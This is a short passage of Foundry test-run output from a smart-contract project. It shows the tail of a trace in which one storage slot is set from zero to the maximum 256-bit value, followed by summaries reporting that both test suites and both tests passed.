    │   @ 0xa61a6d74b23b042d5d7b5b29b8eb5a2207b6ac808505edaef7c2b334e1031a15: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 27.85s (24.80s CPU time)

Ran 2 test suites in 29.64s (29.06s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
